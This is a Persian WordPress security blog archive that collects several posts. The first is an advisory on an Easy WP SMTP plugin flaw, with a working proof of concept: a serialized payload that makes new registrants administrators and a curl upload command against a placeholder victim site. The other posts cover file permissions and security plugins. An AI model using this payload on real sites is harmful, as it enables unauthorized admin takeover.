دیجی اسکریپت

افزایش امنیت وردپرس Archives | دیجی اسکریپت

با بروز رسانی افزونه Easy WP SMTP، از خطر حمله به وردپرس دور بمانید

به تازگی حملاتی به سایت‌های وردپرسی مشاهده شده که پس از تحقیق و بررسی‌های پیاپی مشکل کشف شد. این مشکلات از سمت افزونه Easy WP SMTP است که سایت وردپرسی را در معرض خطر حمله با تزریق کدهای مخرب در آن، قرار می‌دهد. اما چگونه از این خطر حمله به وردپرس دور بمانیم؟ پاسخ شما بسیار ساده است! با بروزرسانی افزونه Easy WP SMTP در وردپرس!
شاید بعضی از دوستان با این افزونه آشنا نباشند. “افزونه Easy WP SMTP امکان پیکربندی و ارسال ایمیل‌های خارجی از طریق یک سرور SMTP را می‌دهد. این امر باعث جلوگیری از ارسال ایمیل‌ها به پوشه‌های Junk یا Spam می‌شود. ”

 

خطر حمله به وردپرس

آسیب‌پذیری که در این افزونه یافت شد از ۱۵ مارس توسط هکرها مورد سوء استفاده قرار گرفت و توسط فایروال افزونه Ninjafirewall به دام افتاد. و نتایج زیر حاصل شد:

add_action( 'admin_init', array( $this, 'admin_init' ) );
...
...
function admin_init() {
    if ( defined( 'DOING_AJAX' ) && DOING_AJAX ) {
         add_action( 'wp_ajax_swpsmtp_clear_log', array( $this, 'clear_log' ) );
         add_action( 'wp_ajax_swpsmtp_self_destruct', array( $this, 'self_destruct_handler' ) );
    }
 
    //view log file
    if ( isset( $_GET[ 'swpsmtp_action' ] ) ) {
        if ( $_GET[ 'swpsmtp_action' ] === 'view_log' ) {
        $log_file_name = $this->opts[ 'smtp_settings' ][ 'log_file_name' ];
        if ( ! file_exists( plugin_dir_path( __FILE__ ) . $log_file_name ) ) {
            if ( $this->log( "Easy WP SMTP debug log filernrn" ) === false ) {
            wp_die( 'Can't write to log file. Check if plugin directory  (' . plugin_dir_path( __FILE__ ) . ') is writeable.' );
            };
        }
        $logfile = fopen( plugin_dir_path( __FILE__ ) . $log_file_name, 'rb' );
        if ( ! $logfile ) {
            wp_die( 'Can't open log file.' );
        }
        header( 'Content-Type: text/plain' );
        fpassthru( $logfile );
        die;
        }
    }
 
    //check if this is export settings request
    $is_export_settings = filter_input( INPUT_POST, 'swpsmtp_export_settings', FILTER_SANITIZE_NUMBER_INT );
    if ( $is_export_settings ) {
        $data                    = array();
        $opts                    = get_option( 'swpsmtp_options', array() );
        $data[ 'swpsmtp_options' ]       = $opts;
        $swpsmtp_pass_encrypted          = get_option( 'swpsmtp_pass_encrypted', false );
        $data[ 'swpsmtp_pass_encrypted' ]    = $swpsmtp_pass_encrypted;
        if ( $swpsmtp_pass_encrypted ) {
        $swpsmtp_enc_key         = get_option( 'swpsmtp_enc_key', false );
        $data[ 'swpsmtp_enc_key' ]   = $swpsmtp_enc_key;
        }
        $smtp_test_mail          = get_option( 'smtp_test_mail', array() );
        $data[ 'smtp_test_mail' ]    = $smtp_test_mail;
        $out                 = array();
        $out[ 'data' ]           = serialize( $data );
        $out[ 'ver' ]            = ۱;
        $out[ 'checksum' ]       = md5( $out[ 'data' ] );
 
        $filename = 'easy_wp_smtp_settings.txt';
        header( 'Content-Disposition: attachment; filename="' . $filename . '"' );
        header( 'Content-Type: text/plain' );
        echo serialize( $out );
        exit;
    }
 
    $is_import_settings = filter_input( INPUT_POST, 'swpsmtp_import_settings', FILTER_SANITIZE_NUMBER_INT );
    if ( $is_import_settings ) {
         $err_msg = __( 'Error occurred during settings import', 'easy-wp-smtp' );
         if ( empty( $_FILES[ 'swpsmtp_import_settings_file' ] ) ) {
            echo $err_msg;
            wp_die();
        }
        $in_raw = file_get_contents( $_FILES[ 'swpsmtp_import_settings_file' ][ 'tmp_name' ] );
        try {
            $in = unserialize( $in_raw );
            if ( empty( $in[ 'data' ] ) ) {
                 echo $err_msg;
                 wp_die();
            }
            if ( empty( $in[ 'checksum' ] ) ) {
                 echo $err_msg;
                 wp_die();
            }
            if ( md5( $in[ 'data' ] ) !== $in[ 'checksum' ] ) {
                 echo $err_msg;
                 wp_die();
            }
            $data = unserialize( $in[ 'data' ] );
            foreach ( $data as $key => $value ) {
                 update_option( $key, $value );
            }
            set_transient( 'easy_wp_smtp_settings_import_success', true, 60 * 60 );
            $url = admin_url() . 'options-general.php?page=swpsmtp_settings';
            wp_safe_redirect( $url );
            exit;
        } catch ( Exception $ex ) {
            echo $err_msg;
            wp_die();
        }
    }
}

با بروز رسانی افزونه Easy WP SMTP، از خطر حمله به وردپرس دور بمانید

دستور ()admin_init در قطعه کد بالا که از اسکریپت افزونه است، زمانی که کاربر به پیشخوان مدیریت دسترسی دارد، توسط admin_init اجرا می‌شود. این مورد باید با درون‌ریزی یا برون‌بری در پیکربندی افزونه و بروز رسانی تنظیمات آن در پایگاه داده مشاهده و حذف شود. این قابلیت سطح دسترسی کاربر را بررسی نمی‌کند، از این رو هر کاربر وارد شده می‌تواند به عنوان یک مشترک باشد. اما این مورد می‌تواند عملیاتی را برای انجام توسط کاربران غیرمجاز و نامعتبر اجرا کند و همین موضوع خطر حمله به وردپرس را دامن می‌زند. زیرا افزونه Easy WP SMTP ممکن است بصورت ایجکسی و در admin_init اجرا شود. این موضوع اینگونه در  WordPress API توصیف شده است:

  • توجه داشته باشید، این مشکل فقط بر روی نمایشگرهای مدیریت شده کاربر اجرا نشده بلکه بر روی admin-post.php و admin-ajax.php نیز ظاهر خواهد شد.

بنابراین، کاربران غیرمجاز توانایی ارسال درخواست‌های ایجکسی مانند action=swpsmtp_clear_log را برای اجرای عملکرد بالا دارند. همین امر خطر حمله به وردپرس را به وجود می‌آورد.

اثبات این مفهوم

با بروز رسانی افزونه Easy WP SMTP، از خطر حمله به وردپرس دور بمانید

برای اثبات مفهومی که در این محتوا در مورد آن صحبت می‌کنیم، از swpsmtp_import_settings برای بارگذاری فایل‌هایی که حاوی سریال‌های مخرب هستند و باعث فعال شدن ثبت‌نام کاربران می‌شوند استفاده کردیم. همچنین نقش کاربر را بصورت پیش‌فرض “مدیر” در پایگاه داده قرار دادیم.

۱- فایلی با عنوان  “tmp/upload.txt/” ایجاد کنید و اطلاعات زیر را در آن وارد نمایید:

a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}

۲- فایل زیر را بارگذاری کنید:

$ curl https://VICTIM.COM/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@/tmp/upload.txt'

سایر دلایل خطر حمله به وردپرس

آسیب‌های دیگر نیز هستند که میزان خطر حمله به وردپرس را افزایش داده و مورد سوء استفاده افراد مخرب قرار می‌گیرند که عبارت است از:

  • اجرای کدهایی که درون آن‌ها کدهای مخرب php تزریق شده زیرا افزونه Easy WP SMTP از یک تابع نا ایمن به نام ()unserialize استفاده می‌کند.
  • مشاهده و حذف لاگ‌ها (یا هر نوع فایلی، زیرا هکرها می‌توانند نام فایل را تغییر دهند.)
  • خروجی گرفتن از افزونه که شامل اطلاعات سرور SMTP، نام کاربری، رمز عبور و استفاده از آن برای ارسال ایمیل‌های اسپم است.

نکته جالب اینجاست که هکرها از این آسیب‌پذیری برای تغییر محتوا و داده‌های وردپرس مانند جدول wp_user_roles در پایگاه داده و توانایی دسترسی مدیر به تمامی کاربران، استفاده می‌کنند. متاسفانه تغییر اکانت مدیر به راحتی در بخش کاربری شناسایی می‌شود. جالب‌تر اینجاست که تشخیص این تغییرات کار بسیار سختی است زیرا اکانت کاربری یک مدیر دقیقا مانند یک کاربر مشترک است فقط در بک‌گراند کار مشخص می‌شود که سطح دسترسی آن بسیار گسترده است.

 

توصیه‌های مهم

اولین و مهم‌ترین توصیه‌ای که برایتان داریم این است که با شتاب هر چه بیشتر افزونه Easy WP SMTP را در جهت حفظ امنیت وردپرس، بروزرسانی کنید. سپس به موارد زیر توجه کنید:

  • به قسمت تنظیمات>> عمومی مراجعه کنید و بررسی کنید که هیچ گزینه‌ای غیر عادی نیست و دست‌کاری نشده است. مواردی از قبیل آدرس سایت، آدرس ایمیل، نقش‌های کاربری و…
  • صفحه کاربران وردپرس را حتما چک کنید، کاربران جدید را بررسی کنید، حساب‌های کاربری غریبه را پیگیری کرده و حذف کنید. همچنین ایمیل مدیریت را نیز بررسی کنید که تغییری نکرده باشد.
  • برای در امان بودن از خطر حمله به وردپرس، تمامی پسوردها را تغییر دهید. (انتخاب پسورد قوی)
  • جدول wp_options را در پایگاه داده وردپرس مورد بررسی قرار دهید و در مورد نقش‌های کاربری در wp_user_roles اطمینان حاصل کنید.
  • فایل‌های سایت خود اسکن کنید زیرا هکرها ممکن است فایل‌هایی مخرب را در سایت شما ایجاد کنند. (اسکن وردپرسی)
  • پسورد SMTP خود را تغییر دهید زیرا ممکن است هکرها آن را کشف کرده باشند.

نوشته با بروز رسانی افزونه Easy WP SMTP، از خطر حمله به وردپرس دور بمانید اولین بار در بیست اسکریپت. پدیدار شد.



لینک منبع مطلب

سطح دسترسی چیست؟ تغییر سطح دسترسی یا پرمیشن فایل‌ها در وردپرس

سطح دسترسی چیست؟ تغییر سطح دسترسی یا پرمیشن فایل‌ها در وردپرس

۴ از ۱ رای


سطح دسترسی چیست؟ تغییر سطح دسترسی یا پرمیشن فایل‌ها

از آنجا که امنیت در لینوکس یک امر حیاتی هست، برای هر فایلی یک سطح دسترسی تنظیم شده. سطوح دسترسی یک فایل، به شما اجازه مشاهده، ویرایش یا نوشتن روی یک فایل را خواهند داد. همان ReadOnly که در ویندوز داشتیم و داریم. اما با کمی چاشنی امنیتی بیشتر!

وردپرس هم با PHP نوشته شده و طبیعتا بهترین سیستم‌عامل برای اجرای پی اچ پی، لینوکس هست. فرقی نمی‌کند کدام نسخه از لینوکس اما همه لینوکس‌ها برای هر فایل و پوشه‌ای سطح دسترسی تنظیم می‌کنند و این سطح دسترسی برای هر فایلی متفاوت هست. پس وردپرس برای اجرای برخی کارها نیاز دارد تا سطح دسترسی برخی از فایل‌ها را تنظیم کند.

در این مطلب می‌خوانید:

انواع سطوح دسترسی فایل‌ها

سطوح دسترسی مختلفی برای نمایش فایل‌ها داریم. وقتی می‌گوییم سطح دسترسی یک پوشه ۷۵۵ هست یعنی دسترسی پوشه به این شکل تنظیم شده:

۵ ۵ ۷
world group user
r+x r+x r+w+x
4+0+1 4+0+1 4+2+1

جدول زیر دارای ۳ حرف r و w و x هست که به شرح زیر تعریف می‌شود:

  • Read به معنای خواندن فایل برابر با عدد ۴
  • Write به معنای نوشتن روی فایل برابر با ۲
  • eXecute به معنای خواندن، ویرایش ، نوشتن و حذف فایل یا پوشه برابر با ۱

چند مثال برای سطح دسترسی فایل‌ها

۰۴۷۷ -r–rwxrwx owner has read only (4), other and group has rwx (7)
0677 -rw-rwxrwx owner has rw only(6), other and group has rwx (7)
0444 -r–r–r– all have read only (4)
0666 -rw-rw-rw- all have rw only (6)
0400 -r——– owner has read only(4), group and others have no permission(0)
0600 -rw——- owner has rw only, group and others have no permission
0470 -r–rwx— owner has read only, group has rwx, others have no permission
0407 -r—–rwx owner has read only, other has rwx, group has no permission
0670 -rw-rwx— owner has rw only, group has rwx, others have no permission
0607 -rw—-rwx owner has rw only, group has no permission and others have rwx

سطح دسترسی مناسب وردپرس

هر سیستمی با استفاده از یک سطح دسترسی متفاوت، وردپرس را اجرا می‌کند. اما قصد دارم یک نمونه سطح دسترسی در وردپرس که در حالت استاندارد وب سرور اجرا می‌شود، به شما معرفی کنم. استانداردی که سرور با آپاچی راه اندازی شده و suexec روی هاست فعال باشد.

تمام فایل‌های شما باید توسط یوزر ftp قابل ویرایش، حذف و نوشتن باشد. در نتیجه همیشه باید یوزر  www یا apache یا nobody سطح دسترسی مورد نیاز را داشته باشد.

نکته: در برخی هاستینگ‌ها مقدار ۰۷۵۵ را بصورت ۷۵۵ و مقدار ۰۶۴۴ را بصورت ۶۴۴ تعریف می‌کنند.

سعی کنید سطح دسترسی فایل های سایت را به ۶۴۴ و پوشه ها را به ۷۵۵ تغییر دهید.

تمام فایل ها و زیر پوشه ها باید تنظیم شوند نه فقط پوشه اصلی. از آنجایی که شما قابلیت ویرایش دسته جمعی سطح دسترسی فایل‌ها و پوشه‌ها را ندارید، بهتر است از هاست مخصوص وردپرس استفاده کنید.

اگر نمی توانید هاست را تغییر دهید باید به هاست خود تیکت دهید تا این مورد را برای شما انجام دهند چون تعداد فایل ها و پوشه ها زیاد هست. لازم به ذکر است هاست شما باید از طریق ssh این کار را انجام دهد.

suexec چیست؟

suexec یک رویکرد تنظیم سرور هست که هر فایل را با استفاده از سطح دسترسی کاربر همان سایت اجرا می‌کند. در نتیجه بهترین حالت امنیتی برای سرور شما خواهد بود.

نکته: از suexec فقط در سایت‌هایی که هاستینگ اشتراکی دارند استفاده کنید. اگر سایت شما توسط سرور اختصاصی خودتان بصورت Single Site میزبانی می‌شود، نیازی به فعالسازی suexec نیست.

تغییر سطح دسترسی در وردپرس

اگر می‌خواهید سطح دسترسی فایل‌ها را تغییر دهید. از روش‌های مختلف می‌توانید اینکار را انجام دهید. روش‌های مختلفی از جمله کنترل پنل هاست شما، SSH و نرم افزار‌های اف تی پی مثل فایل زیلا

تغییر سطح دسترسی فایل‌ با استفاده از FTP

برای تغییر سطح دسترسی فایل با استفاده از اف تی پی ابتدا باید با یک کلاینت اف تی پی وارد فایل منیجر سایت‌تان شوید. با استفاده از آموزش فایل زیلا، وارد FTP سایتتان شوید. سپس فایل مورد نظر را پیدا کنید.

سطح دسترسی فایل در File Zilla
سطح دسترسی فایل در File Zilla

مطابق تصویر بالا، روی فایل راست کلیک کرده و گزینه File Permissions را کلیک کنید. سپس مقدار سطح دسترسی فایل را وارد کرده و کلید اینتر را بفشارید.

به همین راحتی 🙂 سطح دسترسی فایل تغییر کرد.

تغییر سطح دسترسی فایل در سی پنل

برای تغییر سطح دسترسی فایل ابتدا وارد سی پنل شوید.

به انتهای آدرس سایتتان یک /cpanel اضافه کنید. مثلا: mihanwp.com/cpanel

اگر با این آدرس به سی پنل وارد نشدید. از هاستینگ خود آدرس و اطلاعات ورود به سی پنل را دریافت کنید.

صفحه ورود به سی پنل
صفحه ورود به سی پنل

بعد از وارد شدن به سی‌پنل، روی گزینه File Manager کلیک کنید تا وارد مدیریت پوشه‌ها و فایل‌های سایتتان شوید.

حالا فایل یا پوشه مورد نظرتان را انتخاب کنید و روی آن راست کلیک کنید. سپس گزینه Change Permissions را کلیک کنید.

تغییر سطح دسترسی فایل ها در سی پنل
تغییر سطح دسترسی فایل ها در سی پنل

سپس سطح دسترسی مورد نظر خودتان را انتخاب کنید.

تبریک! شما موفق به تغییر سطح دسترسی یا پرمیشن فایل‌ها از طریق سی پنل شدید.

راستی! برای دریافت مطالب وردپرسی در کانال تلگرام میهن وردپرس عضو شوید.



لینک منبع مطلب

افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه ۵٫۶٫۱

وردپرس با وجود آنکه سیستم بسیار قدرتمند و محبوبی است ، اما گاهی مورد نفوذ برخی افراد قرار می گیرد که این امری ناخوشایند است . یکی از مشکلاتی که وبمستران وردپرسی با آن همراه هستند ، فهمیدن استفاده آنها از وردپرس توسط هکران و سایر کاربران می باشد . در این مطلب قصد داریم به شما افزونه ای را معرفی کنیم که توسط آن قادر به مخفی سازی بخش هایی از وروپرس که کاربران را قادر به فهمیدن استفاده شما از وردپرس می سازد ،خواهید بود .

Hide My WP نام یک افزونه فوق العاده در زمینه تغییر و مخفی سازی وردپرس می باشد. این افزونه کاربردی قادر است تمامی اطلاعاتی که نمایانگر استفاده شما از سیستم وردپرس می باشد را از دید کاربران مخفی کند. این افزونه تمامی لینک های مطالب ، برگه ها ، فایل های آپلود شده ، لینک فایل های CSS و Javascript قالب ها و… را به آدرس دلخواه تغییر دهد. به قابلیت های کلی این افزونه اشاره می کنیم

افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه 5.6.1

برخی از امکانات افزونه مخفی سازی وردپرس Hide My WP :

  • تغییر دایرکتوری تم وردپرس، حذف اطلاعات موضوع از شیوه، جایگزین کلاس های پیش فرض WP و در نهایت آن را کوچک کردن!
  • تغییر دایرکتوری پلاگین ها و هش نام پلاگین ها
  • تغییر بارگذاری لینک آپلود-شامل پوشه، wp-includes لینک آزاکس و غیره
  • تغییر لینک نمایش وردپرس
  • تغییر پیوند همیشگی نویسنده (و یا غیر فعال کردن آن!)
  • تغییر و یا غیر فعال کردن فید
  • مخفی کردن همه فایل های وردپرس و دیگر فایل ها!
  • غیر فعال کردن آرشیو وردپرس، دسته ها، برچسب ها، صفحات، پست، و غیره
  • به راحتی هر یک از عبارات جایگزین را در فایل خروجی HTML سایت خود بگذارید!
  • اطلاع دادن به شما درباره سایت وردپرس خودتان (همراه با جزئیات بازدید کننده مانند IP، عامل کاربر، ارجاع و حتی نام کاربری!)
  • فشرده سازی خروجی HTML و حذف نظرات در کد منبع
  • حذف متا اطلاعات وردپرس از هدر و خوراک
  • تغییر ایمیل پیش فرض وردپرس
  • صفحه سفارشی ۴۰۴!
  • حذف کلاس های منو های غیر ضروری
  • پاک کردن کلاس های بادی
  • و..

نوشته افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه ۵٫۶٫۱ اولین بار در دلکد – دانلود اسکریپت. پدیدار شد.



لینک منبع مطلب

جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها

جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها

در این آموزش، در ابتدا اول شما را با عبارت Enumeration آشنا میکنم. فرآیند استخراج نام کاربری، نام سیستم ها، منابع شبکه و سرویس ها از یک سیستم را Enumeration گویند. در مرحله Enumeration هکر کانکشن های فعال به سیستم برقرار میکند و درخواست های مستقیم برای بدست اوردن اطلاعات بیشتر درباره هدف ارسال میکند.

جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها

به طور کلی این فرایند نام های کاربری و میزبان، سرویس های شبکه، جزئیات SNMP و اطلاعات را جمع آوری میکنند. روشهای بسیاری مانند SMTP Enumeration، DNS Enumeration وجود دارد که هکرها میتواند سیستم و یا شبکه هدف را Enumerate کند.

حال نوبت معرفی افزونه امنیتی Stop User Enumeration است که می توانید مانع شوید هکرها نام های کاربری وردپرس شما را اسکن یا شمارش کنند. شمارش کاربر یک نوع حمله است که هکرها میتوانند وبسایت شما را شناسایی و نام کاربری تان را کشف کنند.

این افزونه، کمک می کند این حملات مسدود شوند و حتی اجازه می دهد تا وارد این حملات شوید و حملات بیشتر را در آینده مسدود کنید.

اگر شما روی یک سرور VPS یا سرور اختصاصی هستید، به عنوان حمله IP وارد شده است، شما می توانید از fail2ban برای جلوگیری از حمله به طور مستقیم در فایروال سرور خود، یک راه بسیار قدرتمند برای صاحبان VPS برای جلوگیری از حملات خشونت آمیز به عنوان حملات DDoS استفاده کنید.

نحوه کار با افزونه Stop User Enumeration

مانند همیشه افزونه را نصب و فعالسازی کنید، پس از فعالسازی افزونه منو جدیدی به نام Stop User Enumeration به بخش تنظیمات پنل مدیریت وردپرس اضافه می شود.

نحوه کار با افزونه Stop User Enumeration

وارد صفحه افزونه شوید، در تب Settings سه گزینه وجود دارد:

  • گزینه اول مربوط به فراخوانی API می باشد. در وردپرس همه میتوانند کاربران را با فراخوانی API پیدا کنند. با فعال کردن این گزینه، فراخوانی محدود میشود تنها به کاربرانی که وارد شده اند.
  • گزینه دوم را در صورتی فعال کنید که از fail2ban در VPS خود استفاده می کنید.
  • با فعال کردن گزینه سوم، این افزونه از jQuery برای حذف هر عدد از نام نویسنده دیدگاه استفاده میکند ، به این دلیل است که حمله(Enumeration )، اعداد را کنترل و بررسی می کند.

سه گزینه را فعال و روی دکمه ذخیره تغییرات کلیک کنید.

نوشته جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها اولین بار در دلکد – دانلود اسکریپت. پدیدار شد.



لینک منبع مطلب

جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها

جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها

در این آموزش، در ابتدا اول شما را با عبارت Enumeration آشنا میکنم. فرآیند استخراج نام کاربری، نام سیستم ها، منابع شبکه و سرویس ها از یک سیستم را Enumeration گویند. در مرحله Enumeration هکر کانکشن های فعال به سیستم برقرار میکند و درخواست های مستقیم برای بدست اوردن اطلاعات بیشتر درباره هدف ارسال میکند.

 

جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها

 

به طور کلی این فرایند نام های کاربری و میزبان، سرویس های شبکه، جزئیات SNMP و اطلاعات را جمع آوری میکنند. روشهای بسیاری مانند SMTP Enumeration، DNS Enumeration وجود دارد که هکرها میتواند سیستم و یا شبکه هدف را Enumerate کند.

 

حال نوبت معرفی افزونه امنیتی Stop User Enumeration است که می توانید مانع شوید هکرها نام های کاربری وردپرس شما را اسکن یا شمارش کنند. شمارش کاربر یک نوع حمله است که هکرها میتوانند وبسایت شما را شناسایی و نام کاربری تان را کشف کنند.

 

این افزونه، کمک می کند این حملات مسدود شوند و حتی اجازه می دهد تا وارد این حملات شوید و حملات بیشتر را در آینده مسدود کنید.

اگر شما روی یک سرور VPS یا سرور اختصاصی هستید، به عنوان حمله IP وارد شده است، شما می توانید از fail2ban برای جلوگیری از حمله به طور مستقیم در فایروال سرور خود، یک راه بسیار قدرتمند برای صاحبان VPS برای جلوگیری از حملات خشونت آمیز به عنوان حملات DDoS استفاده کنید.

 

نحوه کار با افزونه Stop User Enumeration

مانند همیشه افزونه را نصب و فعالسازی کنید، پس از فعالسازی افزونه منو جدیدی به نام  Stop User Enumeration به بخش تنظیمات پنل مدیریت وردپرس اضافه می شود.

جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها

وارد صفحه افزونه شوید، در تب Settings سه گزینه وجود دارد:

  • گزینه اول مربوط به فراخوانی API می باشد. در وردپرس همه میتوانند کاربران را با فراخوانی API پیدا کنند. با فعال کردن این گزینه، فراخوانی محدود میشود تنها به کاربرانی که وارد شده اند.
  • گزینه دوم را در صورتی فعال کنید که از fail2ban در VPS خود استفاده می کنید.
  • با فعال کردن گزینه سوم، این افزونه از jQuery برای حذف هر عدد از نام نویسنده دیدگاه استفاده میکند ، به این دلیل است که حمله(Enumeration )، اعداد را کنترل و بررسی می کند.

سه گزینه را فعال و روی دکمه ذخیره تغییرات کلیک کنید.

نوشته جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها اولین بار در بیست اسکریپت. پدیدار شد.



لینک منبع مطلب

افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه ۵٫۶

وردپرس با وجود آنکه سیستم بسیار قدرتمند و محبوبی است ، اما گاهی مورد نفوذ برخی افراد قرار می گیرد که این امری ناخوشایند است . یکی از مشکلاتی که وبمستران وردپرسی با آن همراه هستند ، فهمیدن استفاده آنها از وردپرس توسط هکران و سایر کاربران می باشد . در این مطلب قصد داریم به شما افزونه ای را معرفی کنیم که توسط آن قادر به مخفی سازی بخش هایی از وروپرس که کاربران را قادر به فهمیدن استفاده شما از وردپرس می سازد ،خواهید بود .

Hide My WP نام یک افزونه فوق العاده در زمینه تغییر و مخفی سازی وردپرس می باشد. این افزونه کاربردی قادر است تمامی اطلاعاتی که نمایانگر استفاده شما از سیستم وردپرس می باشد را از دید کاربران مخفی کند. این افزونه تمامی لینک های مطالب ، برگه ها ، فایل های آپلود شده ، لینک فایل های CSS و Javascript قالب ها و… را به آدرس دلخواه تغییر دهد. به قابلیت های کلی این افزونه اشاره می کنیم

افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه 5.6

برخی از امکانات افزونه مخفی سازی وردپرس Hide My WP :

  • تغییر دایرکتوری تم وردپرس، حذف اطلاعات موضوع از شیوه، جایگزین کلاس های پیش فرض WP و در نهایت آن را کوچک کردن!
  • تغییر دایرکتوری پلاگین ها و هش نام پلاگین ها
  • تغییر بارگذاری لینک آپلود-شامل پوشه، wp-includes لینک آزاکس و غیره
  • تغییر لینک نمایش وردپرس
  • تغییر پیوند همیشگی نویسنده (و یا غیر فعال کردن آن!)
  • تغییر و یا غیر فعال کردن فید
  • مخفی کردن همه فایل های وردپرس و دیگر فایل ها!
  • غیر فعال کردن آرشیو وردپرس، دسته ها، برچسب ها، صفحات، پست، و غیره
  • به راحتی هر یک از عبارات جایگزین را در فایل خروجی HTML سایت خود بگذارید!
  • اطلاع دادن به شما درباره سایت وردپرس خودتان (همراه با جزئیات بازدید کننده مانند IP، عامل کاربر، ارجاع و حتی نام کاربری!)
  • فشرده سازی خروجی HTML و حذف نظرات در کد منبع
  • حذف متا اطلاعات وردپرس از هدر و خوراک
  • تغییر ایمیل پیش فرض وردپرس
  • صفحه سفارشی ۴۰۴!
  • حذف کلاس های منو های غیر ضروری
  • پاک کردن کلاس های بادی
  • و..

نوشته افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه ۵٫۶ اولین بار در دلکد – دانلود اسکریپت. پدیدار شد.



لینک منبع مطلب

محافظت از وردپرس با افزونه Secupress

شاید اوایل راه‌اندازی سایتتان خیلی به فکر تامین امنیت آن نباشید؛ اما با گذر زمان و پیشرفت، قطعا امنیت از ارکان اصلی مدیریت وبسایت خواهد شد. چرا که زحمات چندین ساله شما و تیم‌تان ممکن است در کسری از ثانیه از بین برود! خطر همیشه در کمین است.

 

توسعه دهنده‌های وردپرس از سراسر جهان روی راهکارهای محافظت از وردپرس کار می‌کنند که آن هم مدیون متن باز بودن وردپرس هستند. حدود ۳۰ درصد وبسایت‌های موجود با وردپرس ساخته شده‌اند و امنیت آن قطعا برای هر کدام از این سایت‌ها حائز اهمیت است. با آموزش وردپرس امروز همراه ما باشید تا با یک روش عالی ایمنی سایت آشنا شوید.

 

محافظت از وردپرس

چند روز پیش یک افزونه حرفه‌ای برای تامین امنیت وردپرس iTheme Security معرفی کردیم که در دو نسخه رایگان و حرفه‌ای موجود است. امروز نیز می‌خواهیم یکی دیگر از افزونه‌های مطلوب امنیتی با عنوان Secupress را در محافظت از وردپرس بررسی کنیم. امیدوارم همان‌قدر که ما بر امنیت تاکید می‌کنیم، شما هم حواستان به آن باشد.

 

امنیت وردپرس با افزونه Secupress

محافظت از وردپرس با افزونه Secupress

افزونه Secupress را به لحاظ امکانات زیادی که دارد، می توان در دسته افزونه‌های امنیتی جهت محافظت از وردپرس جای داد. افزونه امنیتی Secupress برای تامین امنیت وردپرس راهکارهای جالبی ارائه می‌دهد. گرافیک جذاب این افزونه در کنار عملکرد خوبش، آن را جزو یکی از محبوب‌ترین افزونه‌های امنیتی وردپرس قرار داده. این افزونه با بیش از ۱۰۰۰۰ نصب فعال توانسته ۴٫۵ ستاره در مخزن وردپرس را از آن خود کند.

ویژگی‌های این افزونه

  • دارای فایروال
  • عدم اجازه دسترسی به سایت برای کاربرانی با موقعیت جغرافیایی خاص
  • بلاک کردن IP های مشکوک
  • تشخیص قالب‌ها و افزونه‌های آسیب‌پذیر
  • ارائه گزارش امنیتی در قالب PDF
  • بلاک کردن ربات‌های مخرب
  • عدم اجازه دسترسی به خزنده‌های مخرب
  • و …

این افزونه دارای دو نسخه رایگان و پرمیوم است که در نسخه پولی می‌توانید از قابلیت انجام خودکار وظیفه‌ها توسط خود افزونه استفاده کنید. نسخه رایگان هم امکانات خوبی را به همراه دارد.

 

نصب و راه‌اندازی افزونه Secupress

بسیار خوب! اگر موافق باشید افزونه را نصب کنیم. افزونه را از انتهای همین آموزش دریافت کرده و آن را در مسیر افزونه‌ها نصب و فعال نمایید.
پس از نصب و فعال شدن افزونه، بنری در بالای صفحه ظاهر می‌شود که مربوط به اسکن امنیتی سایت است. ما این کار را پس از پیکربندی افزونه انجام خواهیم داد. فعلا روی دکمه ضربدر روی بنر کلیک کنید.

در سمت راست پیشخوان وردپرس، منوی SecuPress اضافه خواهد شد که تنظیمات افزونه را می توان از این بخش تغییر داد و امکان محافظت از وردپرس را با همین گزینه‌ها فراهم کرد.

محافظت از وردپرس با افزونه Secupress

منوی افزونه شامل ۳ بخش است:

  • Scanners: از این بخش می‌توانید سایت خود را از لحاظ امنیتی اسکن کرده و براساس رتبه امنیت سایتتان، درجه A تا D را دریافت کنید.
  • Mosules: تنظیمات افزونه از این بخش در دسترس هستند.
  • More Security: این گزینه برای خرید دلاری نسخه پولی این افزونه است که عملا برای ما کاربردی ندارد.

 

پیکربندی افزونه

برای پیکربندی افزونه روی گزینه Modules کلیک کنید. در صفحه باز شده سربرگ‌های مختلفی وجود دارند که به شرح هر کدام می‌پردازیم:

محافظت از وردپرس با افزونه Secupress

تذکر: دقت کنید که از ذکر بخش‌هایی که مخصوص نسخه پرمیوم هستند چشم پوشی شده است.

 

سربرگ Dashboard

سربرگ اول Dashboard است که عملا کار خاصی با اینجا نداریم؛ زیرا امکاناتی مثل خروجی گرفتن از تنظیمات افزونه و … در نسخه پرمیوم در دسترس هستند. اما در آخر صفحه می‌توانید در صورت نیاز، تنظیمات افزونه را به حالت اولیه برگردانید. در واقع امکان ریست کردن برایتان فراهم است.

محافظت از وردپرس با افزونه Secupress

سربرگ Users & Login

در این بخش می‌توانید انواع تنظیمات مربوط به ورود به سایت را مشاهده نمایید.

محافظت از وردپرس با افزونه Secupress

